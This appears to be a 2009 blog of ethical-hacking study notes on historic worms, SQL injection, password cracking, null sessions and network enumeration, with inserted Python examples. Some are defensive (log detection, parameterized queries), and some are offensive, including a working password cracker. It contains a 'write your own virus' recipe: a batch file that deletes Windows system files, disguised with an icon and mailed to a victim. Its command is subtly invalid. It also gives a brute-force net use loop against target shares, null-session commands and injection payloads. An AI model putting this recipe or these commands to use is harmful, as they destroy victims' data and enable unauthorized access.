Sunday, December 13, 2009

Anti-Virus Software

The primary defence against viruses is to install anti-virus software and keep its signature updates current.
Prominent anti-virus software vendors include:
McAfee
Norton AntiVirus
AntiViral Toolkit Pro
Dr. Solomon's
Trend Micro
Command AntiVirus
Data Fellows

Hacking Tool: Senna Spy Internet Worm Generator 2000

(http://sennaspy.cjb.net)

This tool generates a worm written in VBScript (.vbs), the same format used by LoveLetter and its variants.

WRITE YOUR OWN VIRUS

Step 1: Create a batch file Game.bat with the following text:
@echo off
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
Step 2: Convert the Game.bat batch file to Game.com using the bat2com utility.
Step 3: Assign an icon to Game.com using the Windows file properties screen.
Step 4: Send the Game.com file as an e-mail attachment to the victim.
Step 5: When the victim runs the program, it deletes core files in the WINNT directory, making Windows unusable.

VIRUSES

Chernobyl
ExploreZip

I Love You
Melissa
Pretty Park
Code Red Worm
W32/Klez
BugBear
W32/Opaserv Worm
Chernobyl (CIH) is a destructive virus. Unlike most of the viruses that have surfaced recently, it is much more than a nuisance.
If infected, Chernobyl will erase data on your hard drive and may overwrite the flash BIOS, which can keep the machine from booting at all.
There are several variants in the wild, and each activates on a different date: version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month.
ExploreZip is a Win32-based e-mail worm. It searches for Microsoft Office documents on your hard drive and network drives.
When it finds Word, Excel or PowerPoint documents (extensions .doc, .xls and .ppt), it erases the contents of those files. It also e-mails itself in reply to anyone who sends you an e-mail.
ExploreZip arrives as an e-mail attachment. The message will most likely come from someone you know, and the body of the message reads:
"I received your email and I shall send you a reply ASAP. Till then, take a look at the attached Zipped docs." The attachment is named "Zipped_files.exe" and carries a WinZip icon. Double-clicking the program infects your computer.
LoveLetter is a Win32-based e-mail worm written in VBScript. It overwrites certain files on your hard drive(s) and sends itself to everyone in your Microsoft Outlook address book.
LoveLetter arrives as an e-mail attachment named LOVE-LETTER-FOR-YOU.TXT.vbs, though newer variants use different names, including VeryFunny.vbs, virus_warning.jpg.vbs and protect.vbs.
SQL INJECTION
User-controlled data is placed into an SQL query without being validated for correct format or for embedded quote and escape characters.
It affects the majority of applications that use a database backend and do not enforce variable types.
At least 50% of large e-commerce sites and about 75% of medium to small sites are vulnerable.
Improper input validation in CFML, ASP, JSP and PHP pages is the most frequent cause.
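The flaw and its fix side by side, as an added example that is not part of the original notes. It uses an in-memory SQLite table with constructed data standing in for the application's backend; the user and password values are made up for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed backend: a single users table with one valid account.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db


def login_vulnerable(db, username, password):
    # User-controlled data is pasted straight into the query text, so a quote
    # character in the input changes the structure of the statement.
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return db.execute(query).fetchone()[0] > 0


def login_parameterized(db, username, password):
    # Bound parameters: the driver passes the values separately from the SQL,
    # so the input can never be interpreted as part of the statement.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone()[0] > 0


def demo():
    db = make_db()
    # Two classic payloads: a tautology in the password field, and a comment
    # sequence in the username field that truncates the password check.
    tautology = "' OR '1'='1"
    comment = "alice'--"
    return {
        "vuln_valid": login_vulnerable(db, "alice", "s3cret"),
        "vuln_tautology": login_vulnerable(db, "nobody", tautology),
        "vuln_comment": login_vulnerable(db, comment, "wrong"),
        "safe_valid": login_parameterized(db, "alice", "s3cret"),
        "safe_tautology": login_parameterized(db, "nobody", tautology),
        "safe_comment": login_parameterized(db, comment, "wrong"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check:15s} {result}")
```

With the tautology, the vulnerable query becomes `... username = 'nobody' AND password = '' OR '1'='1'`, which is true for every row; with the comment payload the whole password clause is commented out. The parameterized version rejects both because the quote and `--` stay inside the bound string.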
Melissa is a Microsoft Word macro virus.
Through its macros, the virus drives the Microsoft Outlook e-mail program so that the virus is sent to the first 50 people in your address book.
It does not corrupt data on your hard drive or crash your computer. It changes some Word settings and mails itself to the people in your address book, which is how it spreads.
Melissa Virus Infection
Melissa arrives as an e-mail attachment.
The subject of the message containing the virus reads "Important Message From", followed by the name of the person whose e-mail account it was sent from.
The body of the message reads: "Here is that document you asked for ... don't show anyone else ;-)". Double-clicking the attached Word document (typically named LIST.DOC) infects your machine.


Pretty Park is a privacy-invading worm. Every 30 seconds it tries to e-mail itself to the addresses in your Microsoft Outlook address book.
It has also been reported to connect the infected machine to an IRC channel, through which the author can retrieve passwords from the system.
Pretty Park arrives as an e-mail attachment. Double-clicking the PrettyPark.exe or Files32.vxd program infects your computer.
You may see the 3D Pipes screensaver after running the executable; that is the decoy.


BUGBEAR VIRUS
This worm propagates via shared network folders and via e-mail.
It also terminates anti-virus programs, acts as a backdoor server and sends out system passwords, all of which compromise security on infected machines.
BugBear Infection
This worm fakes the FROM field and obtains the recipients for its e-mail from messages, address books and mailboxes on the infected system. It generates the filename for the attached copy of itself in one of two ways:
1. One of the strings setup, card, docs, news, Image, images, pics, resume, photo, video, music, song or data, with one of the extensions .SCR, .PIF or .EXE.
2. The name of an existing file on the system with one of the extensions .SCR, .PIF or .EXE appended.
On systems with unpatched Internet Explorer 5.0 and 5.5, the worm attachment is executed automatically when the message is opened or previewed in Microsoft Outlook or Outlook Express.

KLEZ
Aliases: ElKern, KLAZ, Kletz, I-Worm.Klez, W95/Klez@mm
The W32.Klez variants are mass-mailing worms that search the Windows address book for e-mail addresses and send messages to every recipient found. The worm uses its own SMTP engine to send the messages, so it does not depend on the victim's mail client.
The subject and attachment name of the incoming e-mail are chosen at random. The attachment has one of the extensions .bat, .exe, .pif or .scr.
The worm exploits a vulnerability in Microsoft Outlook and Outlook Express (the same IE MIME-header flaw BugBear uses) to execute itself when the message is opened or previewed.

SirCam is a mass-mailing e-mail worm that can also spread through Windows network shares.
SirCam sends e-mails with varying sender names and subject fields, and attaches user documents with double extensions (such as .doc.pif or .xls.lnk) to them.
The worm collects a list of files with certain extensions (.DOC, .XLS, .ZIP) into fake DLL files named sc*.dll. It then sends itself out wrapped around one of the document files it found in the user's "My Documents" folder, which is how private documents leaked from infected machines.

Nimda is a complex virus with a mass-mailing worm component that spreads itself in attachments named README.EXE.
It affects Windows 95, 98, ME, NT 4 and Windows 2000 users.
Nimda was the first worm to modify existing web sites so that they start offering infected files for download. It was also the first worm to use ordinary end-user machines to scan for vulnerable web sites.
Nimda uses the IIS Unicode directory traversal exploit to infect IIS web servers.

The "Code Red" worm attempts to connect to TCP port 80 on a randomly chosen host, assuming that a web server will be found there.
Upon a successful connection to port 80, the attacking host sends a crafted HTTP GET request for /default.ida to the victim, attempting to exploit a buffer overflow in the Indexing Service ISAPI extension shipped with IIS on Windows 2000.
If the exploit is successful, the worm begins executing on the victim host. In the earlier variant of the worm, victim hosts with a default language of English experienced the following defacement on all pages requested from the server:
HELLO! Welcome to http://www.worm.com! Hacked By Chinese!
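A detection pass over web server logs for the probe described above, as an added example rather than part of the original notes. The log lines are constructed in a simplified IIS W3C layout (date, time, client IP, method, URI stem, URI query, status) and the query strings are shortened stand-ins for the real request; the only signature relied on is the publicly documented one, a GET for /default.ida carrying a long filler run followed by %u-encoded bytes, with N filler for Code Red v1/v2 and X filler for Code Red II.

```python
import re

# Constructed sample log. The filler runs are generated rather than typed so
# the lengths are exact; the real worm requests are far longer.
CR1_QUERY = "N" * 100 + "%u9090%u6858%ucbd3%u7801"
CR2_QUERY = "X" * 100 + "%u9090%u6858"
SAMPLE_LOG = "\n".join([
    f"2001-07-19 10:02:31 10.0.0.5 GET /default.ida {CR1_QUERY} 200",
    "2001-07-19 10:02:35 10.0.0.7 GET /index.html - 200",
    f"2001-08-04 10:03:01 10.0.0.9 GET /default.ida {CR2_QUERY} 404",
    "2001-08-04 10:03:09 10.0.0.7 GET /default.ida - 404",
    "2001-08-04 10:03:12 10.0.0.7 POST /scripts/upload.asp - 200",
])

# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")


def classify(uri_stem, query, min_filler=64):
    """Return a label for a Code Red-style .ida probe, or None."""
    if uri_stem.lower() != "/default.ida":
        return None
    # A bare request for default.ida (no filler, no %u shellcode) is a scanner
    # or a typo, not the worm; avoid alerting on it.
    if len(query) < min_filler or "%u" not in query.lower():
        return None
    if query.startswith("N"):
        return "Code Red v1/v2"
    if query.startswith("X"):
        return "Code Red II"
    return "unknown .ida overflow attempt"


def scan(log_text):
    """Yield (source_ip, label, status) for each matching request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the scan
        _ts, src, method, stem, query, status = m.groups()
        if method != "GET":
            continue
        label = classify(stem, query)
        if label:
            hits.append((src, label, int(status)))
    return hits


if __name__ == "__main__":
    for src, label, status in scan(SAMPLE_LOG):
        print(f"{src:12s} {label:18s} status={status}")
```

A 404 on the probe still means the host was targeted; it only tells you the .ida mapping was not present, so the source IP is worth tracking either way.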

Sunday, November 29, 2009

Automatic Password Cracking Algorithm


1. Find a valid user.
2. Find the encryption (hash) algorithm used.
3. Obtain the encrypted passwords.
4. Create a list of possible passwords.
5. Encrypt each word with the same algorithm.
6. See if there is a match for each user ID.
7. Repeat steps 1 through 6 for the remaining users.
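The seven steps carried out in code, as an added example and not part of the original notes. The password store format (user:algorithm$salt$hexdigest) and the accounts in it are assumptions of this example; the store is built here from known plaintexts so the run can check itself. The candidate generator goes slightly beyond the text by applying the cheap mangling rules (capitalisation, appended digit) that real crackers add to a plain wordlist.

```python
import hashlib


def hash_password(algorithm, salt, password):
    # Step 2/5: the one-way function the target applies; hashlib names the
    # algorithm so the same code handles md5, sha1 and sha256 entries.
    return hashlib.new(algorithm, (salt + password).encode()).hexdigest()


def make_store():
    # Step 3: constructed store of encrypted passwords, user -> algo$salt$digest.
    plaintexts = {
        "alice": ("sha1", "a1b2", "Summer2009"),    # dictionary word, capitalised
        "bob": ("sha256", "c3d4", "Tr0ub4dor&3"),   # not in the list: stays uncracked
        "carol": ("md5", "e5f6", "letmein1"),       # dictionary word plus a digit
    }
    return {u: f"{alg}${salt}${hash_password(alg, salt, pw)}"
            for u, (alg, salt, pw) in plaintexts.items()}


WORDLIST = ["password", "letmein", "summer2009", "qwerty"]


def candidates(wordlist):
    # Step 4: the list of possible passwords, expanded with simple mangling.
    for word in wordlist:
        yield word
        yield word.capitalize()
        for digit in range(10):
            yield f"{word}{digit}"


def crack(store, wordlist):
    """Steps 1, 6 and 7: for every user, test each candidate; None if no match."""
    results = {}
    for user, record in store.items():
        algorithm, salt, digest = record.split("$")
        results[user] = None
        for guess in candidates(wordlist):
            if hash_password(algorithm, salt, guess) == digest:
                results[user] = guess
                break
    return results


if __name__ == "__main__":
    for user, password in crack(make_store(), WORDLIST).items():
        print(f"{user:6s} {password or '<not found>'}")
```

The cost is one hash per candidate per user because each entry has its own salt; unsalted schemes such as the NT hash let an attacker hash each candidate once and compare it against every user at the same time, which is why they crack so much faster.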

Tool: hk.exe

The hk.exe utility exploits a flaw in the NT Local Procedure Call (LPC) port handling.
Using hk.exe, a non-admin user can be escalated to the local Administrators group.

Tool: GetAdmin

GetAdmin.exe is a small program that adds a user to the local Administrators group.
It uses a low-level NT kernel routine to set a global flag that allows access to any running process.
You need to be logged on at the server console (or otherwise able to run code locally) to execute the program.
GetAdmin.exe is run from the command line or from a browser.
It only works on NT 4.0 up to Service Pack 3; the post-SP3 hotfix closes the hole.

Privilege Escalation


If an attacker gains access to the network using a non-admin user account, the next step is to gain higher privilege, up to that of an administrator.
This is called privilege escalation.

Hacking Tool: KerbCrack


KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.

Hacking Tool: L0phtCrack

LC4 is a password auditing and recovery package distributed by @stake. Its SMB packet capture feature listens on the local network segment and captures individual login sessions (the challenge/response exchange).
With the L0phtCrack cracking engine, anyone who can sniff the wire for an extended period is almost guaranteed to obtain Administrator status in a matter of days.

Password Sniffing


Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?

Password guessing Countermeasures

Block access to TCP and UDP ports 135-139 (and 445) at the perimeter.
Disable the WINS Client (TCP/IP) binding on any adapter that does not need file sharing.
Use complex passwords and an account lockout policy.
Log failed logon attempts in Event Viewer: in the Security log, event 529 is a failed logon (bad username or password) and 539 is an account lockout, both in the Logon/Logoff category.
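The detection side of that last countermeasure, as an added example and not part of the original notes: a sliding-window count of event 529 per source workstation, plus a list of 539 lockouts. The input is a constructed, simplified export (timestamp, event ID, account, source workstation), not real Event Viewer output, so the parser would need adapting to whatever export format is actually in use.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed export: "date time event_id account source_workstation".
SAMPLE_EVENTS = """\
2009-11-29 02:14:01 529 administrator WS-ATTACK
2009-11-29 02:14:02 529 administrator WS-ATTACK
2009-11-29 02:14:02 529 administrator WS-ATTACK
2009-11-29 02:14:03 529 administrator WS-ATTACK
2009-11-29 02:14:04 529 administrator WS-ATTACK
2009-11-29 02:14:05 529 administrator WS-ATTACK
2009-11-29 02:20:10 529 jsmith JSMITH-PC
2009-11-29 02:31:00 539 administrator WS-ATTACK
2009-11-29 02:44:11 528 jsmith JSMITH-PC
"""

FAILED_LOGON = 529        # bad username or password
ACCOUNT_LOCKED_OUT = 539  # lockout after repeated failures
SUCCESSFUL_LOGON = 528


def parse(text):
    """Return (timestamp, event_id, account, workstation) tuples."""
    events = []
    for line in text.splitlines():
        date, time, event_id, account, workstation = line.split()
        events.append((datetime.fromisoformat(f"{date} {time}"),
                       int(event_id), account, workstation))
    return events


def guessing_sources(events, threshold=5, window=timedelta(minutes=1)):
    """Workstations with >= threshold failed logons inside any window."""
    by_source = defaultdict(list)
    for ts, event_id, _account, workstation in events:
        if event_id == FAILED_LOGON:
            by_source[workstation].append(ts)
    flagged = {}
    for workstation, times in by_source.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window forward until it spans at most `window`.
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[workstation] = max(flagged.get(workstation, 0), count)
    return flagged


def lockouts(events):
    return [(account, workstation)
            for _ts, event_id, account, workstation in events
            if event_id == ACCOUNT_LOCKED_OUT]


if __name__ == "__main__":
    evs = parse(SAMPLE_EVENTS)
    print("guessing sources:", guessing_sources(evs))
    print("lockouts:", lockouts(evs))
```

A single user mistyping a password (JSMITH-PC) stays below the threshold; the burst from WS-ATTACK trips it well before the lockout event arrives, which is the point of alerting on 529 rather than waiting for 539.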

Hacking tool: NTInfoScan (now CIS)

NTInfoScan is a vulnerability scanner for NT 4.0 that produces an HTML report of the security issues found on the target system, with further information on each.

HACKING TOOL : LEGION


Legion automates password guessing against NetBIOS sessions. It scans multiple Class C IP address ranges for Windows shares and also offers a manual dictionary attack tool.

SYSTEM HACKING


Understand the following
Remote password guessing
Eavesdropping
Denial of Service
Buffer overflows
Privilege escalation
Password cracking
keystroke loggers
sniffers
Remote control and backdoors
Port redirection
Covering tracks
Hiding files
Assuming that the NetBIOS port TCP 139 is open, the most effective method of breaking into NT/2000 is password guessing.
Attempt to connect to an enumerated share (IPC$ or C$) and try username/password combinations.
The default Admin$, C$ and %Systemdrive% shares are a good starting point.
Automated password guessing is easy: a simple loop using the NT/2000 shell FOR command around the standard NET USE syntax.
1. Create a simple credentials file, one "password username" pair per line.
2. Pipe this file into the FOR command:
C:\> FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %i /u:%j
Here %i receives the first token (the password) and %j the second (the username); a successful net use means the guess worked.

Saturday, November 28, 2009

Net Bios Null Sessions

The null session is often referred to as the Holy Grail of Windows hacking. Null sessions take advantage of flaws in CIFS/SMB (Common Internet File System / Server Message Block).
You can establish a null session with a Windows (NT/2000/XP) host by logging on with an empty user name and password.
Using these null connections allows you to gather the following information from the host:
List of users and groups
List of machines
List of shares
Users and host SIDs (Security Identifiers)
Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the null user.
C:\> net use \\192.34.34.2\IPC$ "" /u:""
The above syntax connects to the hidden Inter-Process Communication share (IPC$) at IP address 192.34.34.2 with the built-in anonymous user (/u:"") and an empty ("") password.
The attacker now has a channel over which to attempt various techniques.
The CIFS/SMB and NetBIOS standards in Windows 2000 include APIs that return rich information about a machine via TCP port 139, even to unauthenticated users.
Null sessions require access to TCP port 139 and/or TCP port 445.
You could also disable SMB services entirely on individual hosts by unbinding WINS Client (TCP/IP) from the interface.
Edit the registry to restrict the anonymous user:
1. Open regedt32 and navigate to HKLM\SYSTEM\CurrentControlSet\Control\Lsa
2. Choose Edit | Add Value
Value name: RestrictAnonymous
Data type: REG_DWORD
Value: 2 (1 on NT 4.0, which does not support the stricter setting)
NBTscan is a program for scanning IP networks for NetBIOS name information.
For each host that responds it lists the IP address, NetBIOS computer name, logged-in user name and MAC address.
The first thing a remote attacker will try on a Windows 2000 network is to get a list of hosts attached to the wire:
1. net view /domain
2. nbtstat -A <ip address>
DumpSec reveals shares over a null session with the target computer.
The NetBIOS Auditing Tool (NAT) is designed to explore the NetBIOS file-sharing services offered by the target system.
It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client.
If a NetBIOS session can be established at all via TCP port 139, the target is declared "vulnerable".
Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers.
SNMP is simple. Managers send requests to agents, and the agents send back replies.
The requests and replies refer to variables accessible to agent software.
Managers can also send requests to set values for certain variables.
Traps let the manager know that something significant has happened at the agent's end of things:
a reboot
an interface failure,
or that something else that is potentially bad has happened.
Enumerating NT users via SNMP is easy with snmputil, e.g. snmputil walk <target> public .1.3.6.1.4.1.77.1.2.25 walks the LAN Manager MIB user table.
The simplest way to prevent such activity is to remove the SNMP agent or turn off the SNMP service.
If shutting off SNMP is not an option, change the default 'public' community name.
Implement the Group Policy security option called "Additional restrictions for anonymous connections".
Access to null session pipes and null session shares should also be restricted, and IPSec filtering applied.
For clients to locate Windows 2000 domain services such as Active Directory and Kerberos, Windows 2000 relies on DNS SRV records.
A simple zone transfer (nslookup, then ls -d <domain>) can enumerate a lot of interesting network information.
An attacker would look at the following records closely:
1. Global Catalog service (_gc._tcp)
2. Domain Controllers (_ldap._tcp)
3. Kerberos authentication (_kerberos._tcp)
You can easily block zone transfers from the DNS server's property sheet (Zone Transfers tab), allowing them only to listed name servers.

TRACEROUTE

Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live.
Traceroute reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs.
As each router forwards an IP packet, it decrements the TTL. When the TTL reaches zero, the router discards the packet and sends back an ICMP "TTL exceeded" message to the originator. The final host answers the UDP probe (sent to a closed port) with ICMP "port unreachable", which is how traceroute knows it has arrived.
Routers with reverse DNS entries reveal router names, network affiliation and geographic location.
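A simulation of that mechanism, as an added example and not part of the original notes. Real traceroute needs raw sockets and a live network; here the path, addresses and names are constructed, each router decrements the TTL exactly as described, and one hop is configured to drop expired probes silently so the output shows the "*" a practitioner sees when a firewall does not answer.

```python
# Constructed path: (address, reverse-DNS name, answers_time_exceeded).
PATH = [
    ("192.168.1.1", "gw.home.example", True),
    ("10.20.0.1", "core1.isp.example", True),
    ("203.0.113.9", "fw.target.example", False),   # filters ICMP, never answers
    ("198.51.100.4", "www.target.example", True),  # destination
]


def send_probe(path, ttl):
    """Return (reply_kind, replying_address) for one UDP probe with this TTL."""
    last = len(path) - 1
    for hop, (addr, _name, answers) in enumerate(path):
        if hop == last:
            # The destination does not forward, so it does not decrement; it
            # answers the UDP probe on a closed port with ICMP port unreachable.
            return ("port_unreachable", addr)
        ttl -= 1                     # every router decrements on forwarding
        if ttl == 0:
            # Expired here: a cooperative router sends ICMP time exceeded,
            # a filtering one just drops the packet and we time out.
            return ("time_exceeded", addr) if answers else ("timeout", None)
    return ("timeout", None)


def traceroute(path, max_hops=30):
    """Probe with TTL 1, 2, 3 ... until the destination answers."""
    names = {addr: name for addr, name, _ in path}
    hops = []
    for ttl in range(1, max_hops + 1):
        kind, addr = send_probe(path, ttl)
        hops.append((ttl, addr, names.get(addr, "*")))
        if kind == "port_unreachable":
            break
    return hops


if __name__ == "__main__":
    for ttl, addr, name in traceroute(PATH):
        print(f"{ttl:2d}  {addr or '*':15s}  {name}")
```

The hop that never answers still gets counted, because the next TTL value passes through it and expires one router further on; that is why a silent hop shows as a gap rather than ending the trace.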

Locate the Network Range

Commonly includes:
Finding the range of IP addresses
Discerning the subnet mask
Information Sources:
ARIN (American Registry of Internet Numbers)
Traceroute
Hacking Tool:
NeoTrace
Visual Route

NSLOOKUP

Nslookup is a program to query Internet domain name servers. It displays information that can be used to diagnose Domain Name System (DNS) infrastructure.
It helps find additional IP addresses once the authoritative DNS servers are known from whois.
The MX record reveals the IP address of the mail server.
Both Unix and Windows come with an nslookup client.
Third-party clients are also available, e.g. Sam Spade.

Information Gathering Methodology

Unearth initial information
Locate the network range
Ascertain active machines
Discover open ports / access points
Detect operating systems
Uncover services on ports
Map the Network

Defining Footprinting

Footprinting is the blueprinting of the security profile of an organization, undertaken in a methodological manner.
Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
Footprinting results in a unique organization profile with respect to networks (Internet / Intranet / Extranet / Wireless) and systems involved.

RECONNAISSANCE


Reconnaissance refers to the preparatory phase in which an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.
It may involve network scanning, external or internal, carried out without authorization.

ETHICAL HACKING INTRODUCTION


1. Reconnaissance (active / passive)
2. Scanning
3. Gaining access (operating system level / application level / network level / denial of service)
4. Maintaining access (uploading / altering / downloading programs or data)
5. Covering tracks